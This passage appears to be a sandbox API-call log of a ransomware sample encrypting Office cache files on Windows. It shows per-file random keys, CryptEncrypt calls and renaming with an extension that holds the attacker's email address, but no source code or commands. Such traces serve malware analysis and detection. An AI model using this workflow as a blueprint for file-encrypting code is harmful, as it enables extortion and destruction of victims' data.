	[0082.918] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR"
	[0082.918] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0082.920] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUI.msi.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemui.msi.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0082.920] GetProcessHeap () returned 0x540000
	[0082.920] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0082.920] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=3702272) returned 1
	[0082.920] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x387e00
	[0082.920] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0082.920] GetProcessHeap () returned 0x540000
	[0082.920] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0082.920] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0082.920] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0082.922] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0082.922] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0082.922] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x387e00) returned 0x3a20020
	[0082.923] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x387e00) returned 0x3db0020
	[0082.923] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0082.923] ReadFile (in: hFile=0x48c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0x387e00, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0x387e00, lpOverlapped=0x0) returned 1
	[0083.130] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0083.130] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0083.130] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", dwFileAttributes=0x80) returned 1
	[0083.130] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned 76
	[0083.130] GetProcessHeap () returned 0x540000
	[0083.130] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0083.130] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab"
	[0083.130] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR"
	[0083.130] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0083.133] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeLR.cab.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officelr.cab.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0083.133] GetProcessHeap () returned 0x540000
	[0083.133] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0083.133] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=14127746) returned 1
	[0083.134] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xd79282
	[0083.134] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0083.134] GetProcessHeap () returned 0x540000
	[0083.134] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0083.134] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0083.134] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0083.136] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0083.136] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0083.136] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd79282) returned 0x3a20020
	[0083.137] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xd79282) returned 0x47a0020
	[0083.137] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0083.137] ReadFile (in: hFile=0x48c, lpBuffer=0x3a20020, nNumberOfBytesToRead=0xd79282, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3a20020*, lpNumberOfBytesRead=0x3a1f778*=0xd79282, lpOverlapped=0x0) returned 1
	[0084.067] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.067] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.067] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", dwFileAttributes=0x80) returned 1
	[0084.069] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 75
	[0084.069] GetProcessHeap () returned 0x540000
	[0084.069] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfc) returned 0x5b8568
	[0084.070] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll"
	[0084.070] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.070] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.085] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0084.085] GetProcessHeap () returned 0x540000
	[0084.085] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.085] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=655872) returned 1
	[0084.085] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0xa0200
	[0084.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.086] GetProcessHeap () returned 0x540000
	[0084.086] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.086] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.086] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.087] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.088] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.088] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0200) returned 0x3010020
	[0084.088] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0200) returned 0x35e0020
	[0084.088] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.088] ReadFile (in: hFile=0x48c, lpBuffer=0x3010020, nNumberOfBytesToRead=0xa0200, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3010020*, lpNumberOfBytesRead=0x3a1f778*=0xa0200, lpOverlapped=0x0) returned 1
	[0084.117] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.117] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.117] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", dwFileAttributes=0x80) returned 1
	[0084.118] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 91
	[0084.118] GetProcessHeap () returned 0x540000
	[0084.118] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x11c) returned 0x5fb850
	[0084.118] lstrcpyW (in: lpString1=0x5fb850, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest"
	[0084.118] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.118] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.120] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0084.121] GetProcessHeap () returned 0x540000
	[0084.121] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb850 | out: hHeap=0x540000) returned 1
	[0084.121] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=1857) returned 1
	[0084.121] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x741
	[0084.121] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.121] GetProcessHeap () returned 0x540000
	[0084.121] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.121] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.121] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.123] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.123] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.123] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x741) returned 0x5fdb78
	[0084.123] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x741) returned 0x5fe2c8
	[0084.123] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.123] ReadFile (in: hFile=0x48c, lpBuffer=0x5fdb78, nNumberOfBytesToRead=0x741, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fdb78*, lpNumberOfBytesRead=0x3a1f778*=0x741, lpOverlapped=0x0) returned 1
	[0084.123] SetFilePointer (in: hFile=0x48c, lDistanceToMove=-1857, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.123] WriteFile (in: hFile=0x48c, lpBuffer=0x5fe2c8*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5fe2c8*, lpNumberOfBytesWritten=0x3a1f778*=0x741, lpOverlapped=0x0) returned 1
	[0084.123] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fdb78 | out: hHeap=0x540000) returned 1
	[0084.123] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fe2c8 | out: hHeap=0x540000) returned 1
	[0084.123] CloseHandle (hObject=0x48c) returned 1
	[0084.124] GetProcessHeap () returned 0x540000
	[0084.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8460 | out: hHeap=0x540000) returned 1
	[0084.124] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5967c0 | out: hHeap=0x540000) returned 1
	[0084.125] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb788 | out: hHeap=0x540000) returned 1
	[0084.125] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5fb6c0 | out: hHeap=0x540000) returned 1
	[0084.125] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xa0) returned 0x5fbb90
	[0084.125] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x100) returned 0x5b8460
	[0084.125] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x8) returned 0x5967c0
	[0084.125] CryptGenRandom (in: hProv=0x588c50, dwLen=0x20, pbBuffer=0x5b8460 | out: pbBuffer=0x5b8460) returned 1
	[0084.125] CryptGenRandom (in: hProv=0x588c50, dwLen=0x8, pbBuffer=0x5967c0 | out: pbBuffer=0x5967c0) returned 1
	[0084.125] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", dwFileAttributes=0x80) returned 1
	[0084.125] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 76
	[0084.125] GetProcessHeap () returned 0x540000
	[0084.125] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0xfe) returned 0x5b8568
	[0084.125] lstrcpyW (in: lpString1=0x5b8568, lpString2="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe"
	[0084.125] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR"
	[0084.125] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1
	[0084.127] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x48c
	[0084.127] GetProcessHeap () returned 0x540000
	[0084.127] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x5b8568 | out: hHeap=0x540000) returned 1
	[0084.127] GetFileSizeEx (in: hFile=0x48c, lpFileSize=0x3a1f73c | out: lpFileSize=0x3a1f73c*=519584) returned 1
	[0084.127] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x3a1f758*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x3a1f758*=0) returned 0x7eda0
	[0084.127] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x3a1f774*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x3a1f774*=0x100) returned 1
	[0084.127] GetProcessHeap () returned 0x540000
	[0084.127] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x8, Size=0x100) returned 0x5b8568
	[0084.127] CryptEncrypt (in: hKey=0x574ea0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x20, dwBufLen=0x100 | out: pbData=0x5b8568*, pdwDataLen=0x3a1f764*=0x100) returned 1
	[0084.128] WriteFile (in: hFile=0x48c, lpBuffer=0x5b8568*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5b8568*, lpNumberOfBytesWritten=0x3a1f778*=0x100, lpOverlapped=0x0) returned 1
	[0084.129] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x8, lpOverlapped=0x0) returned 1
	[0084.129] WriteFile (in: hFile=0x48c, lpBuffer=0x5967c0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x5967c0*, lpNumberOfBytesWritten=0x3a1f778*=0x4, lpOverlapped=0x0) returned 1
	[0084.129] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7eda0) returned 0x3790048
	[0084.131] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x7eda0) returned 0x3a20048
	[0084.132] SetFilePointer (in: hFile=0x48c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0084.132] ReadFile (in: hFile=0x48c, lpBuffer=0x3790048, nNumberOfBytesToRead=0x7eda0, lpNumberOfBytesRead=0x3a1f778, lpOverlapped=0x0 | out: lpBuffer=0x3790048*, lpNumberOfBytesRead=0x3a1f778*=0x7eda0, lpOverlapped=0x0) returned 1
